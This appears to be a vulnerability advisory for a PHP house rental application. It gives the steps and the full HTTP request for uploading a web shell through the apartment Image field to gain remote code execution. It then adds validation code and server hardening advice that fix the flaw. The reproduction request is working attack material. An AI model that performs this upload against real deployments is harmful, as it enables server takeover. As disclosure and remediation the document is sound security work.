# Simple House Rental System Unrestricted File Upload + RCE

# Author: D4rkP0w4r

* Note => Requires a client (tenant) login; no admin login is needed
* Description => Login as client => Upload web shell via the Image field

# Steps to Reproduce

* Login to client -> Register -> Apartment Registration -> Image -> Submit

# Exploit

* Upload web shell at Image
* When the upload succeeds, access /app/uploads/shell.php
* Web shell active

# Vulnerable Code

* No file checking before uploading: the file is stored under /app/uploads/ with its original name, so a .php upload is reachable and executed

# POC

* Injection Point

```
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
```

* Request

```http
POST /SimpleHouseRental_PHP/app/register.php HTTP/1.1
Host: localhost:8080
Content-Length: 179829
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySn3eV71wUmAMRV4e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/SimpleHouseRental_PHP/app/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=1qok9ei0dral0qkos2ckaq36lr
Connection: close

------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="apartment_name"

root
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="mobile"

1234567890
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="alternat_mobile"

1234567890
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="email"

haha@gmail.com
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="plot_number"

10
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="country"

USA
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="state"

Newyork
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="city"

Newyork
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="landmark"

10
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="address"

23/2/2
------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

------WebKitFormBoundarySn3eV71wUmAMRV4e
Content-Disposition: form-data; name="register_apartment"

register_apartment
------WebKitFormBoundarySn3eV71wUmAMRV4e--
```

* POC VIDEO

https://drive.google.com/file/d/1ZmGyRo9Ah8w3NQF93vsYEj4JQExyVT7Z/view?usp=sharing
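The root cause above is that the `image` part is written to `app/uploads/` without any validation. The following PHP is an added defensive example written for this page; it is not code from the Simple House Rental System project. Only the `image` field name, the `register_apartment` submit field and the `app/uploads/` directory are taken from the advisory; the function name `store_uploaded_image`, the size limit and the handler shape in the trailing comment are assumptions. It shows the checks the vulnerable handler is missing: the file must have arrived through an HTTP upload, its type is decided from content rather than from the client's filename or `Content-Type`, the extension is chosen by the server from an allowlist, and the stored name is random, so a filename such as `shell.php` can never reach the web root.

```php
<?php
// Added defensive example (not the project's own code): server-side validation
// for the "image" field handled by app/register.php. The field name and the
// app/uploads/ directory come from the advisory; everything else is assumed.

declare(strict_types=1);

const MAX_IMAGE_BYTES = 2 * 1024 * 1024; // assumed limit

// Content-sniffed MIME types that are accepted, mapped to the extension the
// server assigns. The client-supplied filename and Content-Type are ignored.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and move it into $uploadDir under a random,
 * server-chosen name. Returns the stored filename; throws on any failure.
 */
function store_uploaded_image(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . (int)($file['error'] ?? -1));
    }

    $tmp = $file['tmp_name'] ?? '';
    // Reject anything that was not delivered by the current POST upload.
    if ($tmp === '' || !is_uploaded_file($tmp)) {
        throw new RuntimeException('Not an uploaded file');
    }
    if (filesize($tmp) > MAX_IMAGE_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Decide the type from the bytes on disk, not from request headers.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmp);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('Unsupported file type: ' . var_export($mime, true));
    }

    // Second, independent parser: the file must decode as an image and the
    // detected MIME types must agree. A script with a forged header fails here.
    $info = @getimagesize($tmp);
    if ($info === false || ($info['mime'] ?? null) !== $mime) {
        throw new RuntimeException('File is not a valid image');
    }

    // Extension from the allowlist, name from the CSPRNG: the original
    // filename never influences the path that ends up under the web root.
    $ext  = ALLOWED_IMAGE_TYPES[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644); // readable by the web server, never executable
    return $name;
}

// Assumed shape of the apartment registration handler in app/register.php:
if (isset($_POST['register_apartment'])) {
    try {
        $stored = store_uploaded_image($_FILES['image'] ?? [], __DIR__ . '/uploads');
        // Persist $stored (the random server-side name) in the database,
        // never the filename supplied by the client.
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Validation alone should not be the only layer. Because an image that passes both parsers can still carry arbitrary trailing bytes, the web server should also refuse to execute anything under `app/uploads/` (for example `php_admin_flag engine off` inside an Apache `<Directory>` block for that path when mod_php is in use, or an equivalent nginx `location` rule that serves the directory as static files only). On existing deployments, any file under `app/uploads/` whose extension is not one of the allowlisted image types, or whose content does not parse as an image, is a straightforward indicator that this issue has already been exploited.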